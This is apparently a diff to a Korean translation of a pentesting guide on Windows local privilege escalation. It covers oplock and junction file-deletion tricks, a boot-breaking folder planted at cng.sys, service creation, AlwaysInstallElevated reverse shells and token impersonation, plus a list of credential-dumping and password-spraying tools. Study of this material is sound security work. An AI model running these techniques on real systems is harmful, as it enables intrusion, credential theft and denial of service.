**junction**으로 변환: @@ -1502,72 +1529,72 @@ WaitForDeleteToTriggerOplock(); # folder1 is now a junction to \RPC Control (non-filesystem namespace) mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control ``` -- 옵션 C: `\RPC Control`에 **symlink**를 생성: +- 옵션 C: `\RPC Control`에 **symlink** 생성: ```bash # Make file1.txt point to a sensitive folder stream CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION") ``` -> 이것은 폴더 메타데이터를 저장하는 NTFS 내부 스트림을 겨냥한다 — 이를 삭제하면 폴더가 삭제된다. +> 이것은 폴더 메타데이터를 저장하는 NTFS 내부 스트림을 겨냥합니다 — 이를 삭제하면 폴더가 삭제됩니다. 5. 5단계: oplock 해제 -- SYSTEM 프로세스가 계속 진행되며 `file1.txt`를 삭제하려고 시도한다. +- SYSTEM 프로세스가 계속 실행되며 `file1.txt`를 삭제하려고 시도합니다. - 하지만 이제 junction + symlink 때문에 실제로 삭제되는 것은: ``` C:\Config.Msi::$INDEX_ALLOCATION ``` -**결과**: `C:\Config.Msi`는 SYSTEM에 의해 삭제됩니다. +**결과**: `C:\Config.Msi`가 SYSTEM에 의해 삭제됩니다. -### Arbitrary Folder Create에서 Permanent DoS로 +### Arbitrary Folder Create에서 영구 DoS로 -다음 프리미티브를 악용하면 **create an arbitrary folder as SYSTEM/admin**를 수행할 수 있습니다 — 심지어 **you can’t write files**이거나 **set weak permissions**할 수 없는 경우에도. +SYSTEM/admin로 임의의 폴더를 생성할 수 있는 프리미티브를 악용하세요 — 심지어 **파일을 쓸 수 없거나** 또는 **약한 권한을 설정할 수 없는 경우에도**. -예를 들어 **critical Windows driver**의 이름을 가진 **folder**(파일 아님)를 생성하세요: +예: **폴더**(파일 아님)를 **critical Windows driver** 이름으로 생성하세요: ``` C:\Windows\System32\cng.sys ``` - 이 경로는 일반적으로 `cng.sys` 커널 모드 드라이버에 해당합니다. -- 만약 **사전에 폴더로 생성해 둔다면**, Windows는 부팅 시 실제 드라이버를 로드하지 못합니다. -- 그러면 Windows는 부팅 중에 `cng.sys`를 로드하려 시도합니다. -- 폴더를 발견하면, **실제 드라이버를 확인하지 못하고**, **시스템이 충돌하거나 부팅이 중단**됩니다. -- 외부 개입(예: 부트 복구나 디스크 접근) 없이는 **대체 수단이 없으며**, **복구도 불가능**합니다. +- 만약 해당 경로를 **사전에 폴더로 만들어 놓으면**, Windows는 부팅 시 실제 드라이버를 로드하지 못합니다. +- 그다음 Windows는 부팅 중에 `cng.sys`를 로드하려 시도합니다. +- 폴더를 발견하면, **실제 드라이버를 찾지 못하고**, **충돌하거나 부팅이 중단됩니다**. +- 외부 개입(예: 부팅 복구 또는 디스크 접근) 없이는 **대체 수단이 없고**, **복구할 수 없습니다**. -## **High Integrity에서 SYSTEM으로** +## **High Integrity에서 System으로** ### **새 서비스** -이미 High Integrity 프로세스에서 실행 중이라면, **SYSTEM으로 가는 경로**는 단지 **새 서비스를 생성하고 실행하는 것만으로** 쉽게 확보될 수 있습니다: +이미 High Integrity 프로세스에서 실행 중이라면, **SYSTEM으로 가는 경로**는 단순히 **새 서비스를 생성하고 실행하는 것**으로 쉽게 열릴 수 있습니다: ``` sc create newservicename binPath= "C:\windows\system32\notepad.exe" sc start newservicename ``` > [!TIP] -> 서비스 바이너리를 만들 때, 유효한 서비스인지 또는 바이너리가 서비스로서 필요한 동작을 수행하는지 확인하세요. 그렇지 않으면 유효한 서비스가 아닐 경우 20초 안에 종료됩니다. +> 서비스 바이너리를 생성할 때 해당 바이너리가 유효한 서비스인지, 아니면 서비스가 아닐 경우 필요한 동작을 수행하여 지속되도록(유효한 서비스가 아니면 20s 내에 종료됩니다) 만들어졌는지 확인하세요. ### AlwaysInstallElevated -High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목을 활성화**하고 _**.msi**_ 래퍼를 사용해 리버스 셸을 **설치**해 볼 수 있습니다.\ +High Integrity 프로세스에서 **AlwaysInstallElevated 레지스트리 항목을 활성화**하고 _**.msi**_ 래퍼를 사용해 reverse shell을 **설치**해볼 수 있습니다.\ [More information about the registry keys involved and how to install a _.msi_ package here.](#alwaysinstallelevated) ### High + SeImpersonate privilege to System -**다음을 확인할 수 있습니다** [**find the code here**](seimpersonate-from-high-to-system.md)**.** +**You can** [**find the code here**](seimpersonate-from-high-to-system.md)**.** ### From SeDebug + SeImpersonate to Full Token privileges -이 토큰 권한들을 가지고 있다면(대개 이미 High Integrity 프로세스에서 찾게 됩니다), SeDebug 권한으로 거의 모든 프로세스(보호된 프로세스 제외)를 **열고**, 해당 프로세스의 **토큰을 복사**하여 그 토큰으로 **임의의 프로세스를 생성**할 수 있습니다.\ -이 기법을 사용할 때는 보통 **SYSTEM으로 실행 중인 프로세스 중 토큰 권한이 모두 있는 프로세스**를 선택합니다 (_예, 모든 토큰 권한이 없는 SYSTEM 프로세스도 찾을 수 있습니다_).\ -**You can find an** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**.** +해당 토큰 권한을 가지고 있다면(대개 이미 High Integrity 프로세스에서 발견됩니다), SeDebug 권한으로 거의 모든 프로세스(Protected Process 제외)를 **열어**, 그 프로세스의 토큰을 **복사**하고 해당 토큰으로 **임의의 프로세스**를 생성할 수 있습니다.\ +이 기법을 사용할 때는 보통 모든 토큰 권한을 가진 SYSTEM으로 실행 중인 프로세스를 **선택**합니다(예, 모든 토큰 권한이 없는 SYSTEM 프로세스도 있을 수 있습니다).\ +**다음에서** [**example of code executing the proposed technique here**](sedebug-+-seimpersonate-copy-token.md)**을(를) 확인하세요.** ### **Named Pipes** -이 기법은 meterpreter의 `getsystem`에서 사용됩니다. 기법은 **파이프를 생성하고**, 그 파이프에 쓰도록 **서비스를 생성/악용**하는 것으로 구성됩니다. 그런 다음, **파이프를 생성한 서버**는 **`SeImpersonate`** 권한을 사용하여 파이프 클라이언트(서비스)의 **토큰을 가장(impersonate)** 하여 SYSTEM 권한을 얻을 수 있습니다.\ +이 기법은 meterpreter가 getsystem으로 권한 상승할 때 사용됩니다. 기법은 **파이프를 생성한 뒤 서비스가 그 파이프에 쓰도록 서비스 생성/악용**하는 것으로 구성됩니다. 이후 **SeImpersonate** 권한을 사용해 파이프를 생성한 **서버**는 파이프 클라이언트(서비스)의 토큰을 **임퍼슨네이션(impersonate)** 하여 SYSTEM 권한을 획득할 수 있습니다.\ If you want to [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\ If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md). ### Dll Hijacking -**SYSTEM으로 실행 중인 프로세스가 로드하는 dll을 hijack**할 수 있다면 해당 권한으로 임의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 권한 상승에 유용하며, 특히 High Integrity 프로세스에서 더 **쉽게 달성**할 수 있습니다. High Integrity 프로세스는 일반적으로 dll을 로드하는 폴더에 **쓰기 권한**을 갖기 때문입니다.\ +만약 SYSTEM으로 실행되는 **프로세스**가 로드하는 **dll**을 **hijack**할 수 있다면 그 권한으로 임의의 코드를 실행할 수 있습니다. 따라서 Dll Hijacking은 이러한 유형의 권한 상승에 유용하며, 특히 high integrity 프로세스에서 더 쉽게 달성될 수 있습니다. 해당 프로세스는 dll을 로드하는 폴더에 대한 **쓰기 권한**을 가지고 있기 때문입니다.\ **You can** [**learn more about Dll hijacking here**](dll-hijacking/index.html)**.** ### **From Administrator or Network Service to System** @@ -1586,45 +1613,45 @@ If you want to read an example of [**how to go from high integrity to System usi ## Useful tools -**Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +**Windows 로컬 권한 상승 벡터를 찾기 위한 최고의 도구:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) **PS** [**PrivescCheck**](https://github.com/itm4n/PrivescCheck)\ -[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- 잘못된 구성 및 민감한 파일을 확인합니다 (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). Detected.**\ -[**JAWS**](https://github.com/411Hall/JAWS) **-- 일부 가능한 잘못된 구성 확인 및 정보 수집 (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ -[**privesc** ](https://github.com/enjoiz/Privesc)**-- 잘못된 구성 확인**\ -[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- PuTTY, WinSCP, SuperPuTTY, FileZilla, RDP 저장된 세션 정보를 추출합니다. 로컬에서는 -Thorough 사용.**\ -[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Credential Manager에서 자격증명 추출. Detected.**\ -[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- 수집한 비밀번호를 도메인에 대해 스프레이**\ -[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- PowerShell ADIDNS/LLMNR/mDNS/NBNS 스푸퍼 및 MITM 도구.**\ -[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- 기본적인 Windows privesc 열람**\ -[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- 알려진 privesc 취약점 검색 (Watson으로 대체되어 DEPRECATED)\ +[**PowerSploit-Privesc(PowerUP)**](https://github.com/PowerShellMafia/PowerSploit) **-- 잘못된 설정과 민감한 파일을 검사합니다 (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**). 탐지됨.**\ +[**JAWS**](https://github.com/411Hall/JAWS) **-- 일부 가능한 잘못된 설정을 검사하고 정보를 수집합니다 (**[**check here**](https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/broken-reference/README.md)**).**\ +[**privesc** ](https://github.com/enjoiz/Privesc)**-- 잘못된 설정을 검사합니다**\ +[**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) **-- PuTTY, WinSCP, SuperPuTTY, FileZilla, RDP 저장 세션 정보를 추출합니다. 로컬에서는 -Thorough를 사용하세요.**\ +[**Invoke-WCMDump**](https://github.com/peewpw/Invoke-WCMDump) **-- Credential Manager에서 자격증명을 추출합니다. 탐지됨.**\ +[**DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray) **-- 수집한 비밀번호를 도메인에 스프레이합니다**\ +[**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **-- PowerShell 기반 ADIDNS/LLMNR/mDNS/NBNS 스푸퍼 및 중간자(mitm) 도구입니다.**\ +[**WindowsEnum**](https://github.com/absolomb/WindowsEnum/blob/master/WindowsEnum.ps1) **-- 기본적인 Windows privesc 열거 스크립트**\ +[~~**Sherlock**~~](https://github.com/rasta-mouse/Sherlock) **\~\~**\~\~ -- 알려진 privesc 취약점을 검색합니다 (DEPRECATED for Watson)\ [~~**WINspect**~~](https://github.com/A-mIn3/WINspect) -- 로컬 검사 **(Admin 권한 필요)** **Exe** -[**Watson**](https://github.com/rasta-mouse/Watson) -- 알려진 privesc 취약점 검색 (VisualStudio로 컴파일 필요) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ -[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 호스트를 열람하여 잘못된 구성 검색 (정보 수집 도구에 더 가깝고 privesc용이라기보다 정보 수집용) (컴파일 필요) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ -[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- 다양한 소프트웨어에서 자격증명 추출 (GitHub에 precompiled exe 있음)**\ -[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUp의 C# 포트**\ -[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 잘못된 구성 확인 (실행 파일이 GitHub에 있음). 권장하지 않음. Win10에서 잘 작동하지 않음.\ -[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- 가능한 잘못된 구성 확인 (python으로 만든 exe). 권장하지 않음. Win10에서 잘 작동하지 않음. +[**Watson**](https://github.com/rasta-mouse/Watson) -- 알려진 privesc 취약점을 검색합니다 (VisualStudio로 컴파일 필요) ([**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/watson))\ +[**SeatBelt**](https://github.com/GhostPack/Seatbelt) -- 호스트를 열거하여 잘못된 설정을 탐색합니다(정보 수집 도구에 가깝고 privesc보다는 정보 수집에 적합) (컴파일 필요) **(**[**precompiled**](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)**)**\ +[**LaZagne**](https://github.com/AlessandroZ/LaZagne) **-- 다양한 소프트웨어에서 자격증명을 추출합니다 (GitHub에 사전 컴파일된 exe 존재)**\ +[**SharpUP**](https://github.com/GhostPack/SharpUp) **-- PowerUp의 C# 포팅**\ +[~~**Beroot**~~](https://github.com/AlessandroZ/BeRoot) **\~\~**\~\~ -- 잘못된 설정 검사 (GitHub에 사전 컴파일된 실행 파일). 권장하지 않음. Win10에서 잘 동작하지 않습니다.\ +[~~**Windows-Privesc-Check**~~](https://github.com/pentestmonkey/windows-privesc-check) -- 가능한 잘못된 설정을 검사합니다 (python 기반 exe). 권장하지 않음. Win10에서 잘 동작하지 않습니다. **Bat** -[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- 이 게시물을 기반으로 만든 도구 (accesschk 없이도 제대로 동작하지만 사용할 수 있음). +[**winPEASbat** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)-- 이 포스트를 기반으로 만든 도구(정상 동작을 위해 accesschk가 필요하지 않지만 사용할 수 있습니다). **Local** -[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- **systeminfo** 출력값을 읽어 작동 가능한 익스플로잇을 추천 (로컬 python)\ -[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- **systeminfo** 출력값을 읽어 작동 가능한 익스플로잇을 추천 (로컬 python) +[**Windows-Exploit-Suggester**](https://github.com/GDSSecurity/Windows-Exploit-Suggester) -- **systeminfo** 출력 결과를 읽어 동작 가능한 익스플로잇을 추천합니다 (로컬 python)\ +[**Windows Exploit Suggester Next Generation**](https://github.com/bitsadmin/wesng) -- **systeminfo** 출력 결과를 읽어 동작 가능한 익스플로잇을 추천합니다 (로컬 python) **Meterpreter** _multi/recon/local_exploit_suggestor_ -프로젝트를 올바른 버전의 .NET으로 컴파일해야 합니다 ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). 피해자 호스트에 설치된 .NET 버전을 확인하려면 다음을 실행할 수 있습니다: +프로젝트는 올바른 버전의 .NET으로 컴파일해야 합니다 ([see this](https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions/)). 공격 대상 호스트에 설치된 .NET 버전을 확인하려면 다음을 실행할 수 있습니다: ``` C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line ``` @@ -1647,4 +1674,6 @@ C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the - [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE) and kernel token theft](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [Check Point Research – Chasing the Silver Fox: Cat & Mouse in Kernel Shadows](https://research.checkpoint.com/2025/silver-fox-apt-vulnerable-drivers/) + {{#include ../../banners/hacktricks-training.md}}